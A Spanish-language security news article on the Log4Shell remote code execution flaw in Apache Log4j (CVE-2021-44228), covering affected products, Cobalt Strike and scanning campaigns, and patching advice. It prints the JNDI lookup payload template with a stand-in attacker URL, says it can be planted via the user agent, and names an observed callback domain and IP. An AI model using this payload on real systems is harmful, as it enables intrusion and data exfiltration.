Log4Shell: Nuevo 0-day y exploit RCE en Apache Log4j (CVE-2021-44228)

December 13, 2021

El viernes por la mañana temprano, se lanzó públicamente un exploit para una  vulnerabilidad crítica de día cero denominada 'Log4Shell'  en la plataforma de registro Apache Log4j basada en Java que se utiliza para acceder a los registros de aplicaciones y servidores web.

Para aprovechar esta vulnerabilidad, un actor de amenazas puede cambiar el agente de usuario de su navegador web y visitar un sitio o buscar una cadena en un sitio web usando el formato ${jndi:ldap://[attacker_URL]}. Si lo hace, la cadena se agregará a los registros de acceso del servidor web. Millones de aplicaciones emplean Log4j para el registro de eventos, y todo lo que el atacante necesita hacer es hacer que la aplicación registre una cadena especial. Hasta ahora, se ha confirmado que iCloud, Steam y hasta Minecraft son vulnerables.


Descripción de la vulnerabilidad

Apache Log4j es una herramienta de registro basada en el lenguaje de programación Java. Esta herramienta reescribe el marco Log4j e introduce un montón de características. El marco de registro se utiliza ampliamente en el desarrollo de sistemas empresariales para registrar información.

El 24 de noviembre de 2021, el equipo de seguridad de Alibaba Cloud informó oficialmente de la vulnerabilidad de ejecución remota de código de Apache Log4j. Debido a que algunas funciones de Apache Log4j tienen funciones de análisis recursivo, y gracias a esto, los atacantes pueden construir directamente solicitudes maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

La explotación de la vulnerabilidad no requiere una configuración especial. Tras la verificación por parte del equipo de seguridad de Alibaba Cloud se ven afectados:

– Apache Struts2
– Apache Solr
– Apache Druid
– Apache Flink

Balizas de impacto de cobalto

El Centro de Inteligencia de Amenazas de Microsoft no se quedó atrás y también informo que las vulnerabilidades de Log4j también están siendo explotadas para eliminar balizas de Cobalt Strike.

Cobalt Strike es un juego de herramientas de prueba de penetración legítimo en el que los equipos rojos despliegan agentes, o balizas, en dispositivos "comprometidos" para realizar vigilancia de red remota o ejecutar comandos adicionales.

Sin embargo, los actores de amenazas suelen utilizar versiones pirateadas de Cobalt Strike como parte de las brechas de red y durante los ataques de ransomware.

Escaneo y divulgación de información

Además de emplear los exploits Log4Shell para instalar malware, los actores de amenazas y los investigadores de seguridad están usando el exploit para buscar servidores vulnerables y extraer información de ellos.

Como puede ver a continuación, los investigadores emplean el exploit para obligar a los servidores vulnerables a acceder a las URL o efectuar solicitudes de DNS para dominios de devolución de llamada.

Esto permite a los investigadores o actores de amenazas determinar si el servidor es vulnerable y utilizarlo para futuros ataques, investigaciones o intentos de reclamar una recompensa por errores. Nuestro equipo de expertos mencionan que pueden ir demasiado lejos al emplear el exploit para extraer variables de entorno que contienen datos del servidor sin permiso, incluido el nombre del host, el nombre de usuario con el que se ejecuta el servicio Log4j, el nombre del sistema operativo y el número de versión del sistema operativo.

Los dominios o direcciones IP más comunes que se utilizan como parte del escaneo son / o campañas de exfiltración de datos son:


Uno de los investigadores del centro BleepingComputer menciona que mientras el dominio se usaba como devolución de llamada de explotación, bingsearchlib.com no estaba registrado.

El investigador de seguridad dijo que registraron el dominio para evitar que los actores de amenazas abusen de él, pero no registran solicitudes.

La empresa de inteligencia de amenazas  GreyNoise muestra  que las direcciones IP que usan la devolución de llamada bingsearchlib.com también suelen emplear una devolución de llamada Log4Shell de 205.185.115.217:47324.

Recomendaciones de nuestros expertos

Te recomendamos que si trabajas con Log4j2 utiliza la última versión de este mismo para resolver esta vulnerabilidad lo antes posible, y también actualizar las aplicaciones y componentes que se sabe son vulnerables:

  • srping-boot-strater-log4j2
  • Apache Solr
  • Apache Flink
  • Apache Druid

Para más información puedes consultar:

- Descubierta Log4Shell, “la mayor vulnerabilidad crítica de la última década” que afecta a millones de servidores

- CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2
- Log4j: la vulnerabilidad de la que todos hablan
- Log4Shell: vulnerabilidad 0day de ejecución remota de código en Apache Log4j
- Solicitud de actualización del proyecto - Log4J
- CVE-2021-44228 Detalle

- Se está explotando activamente la vulnerabilidad de día 0 de Log4j RCE.